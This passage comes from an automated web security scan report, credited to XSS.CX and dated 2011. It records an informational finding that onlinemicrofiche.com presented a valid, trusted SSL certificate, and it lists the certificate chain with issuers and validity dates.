Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
37.2. https://www.onlinemicrofiche.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.onlinemicrofiche.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Dec 02 18:00:00 CST 2009
Valid to:  Fri Dec 13 17:59:59 CST 2013

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
Report generated by XSS.CX at Mon May 02 10:53:10 CDT 2011.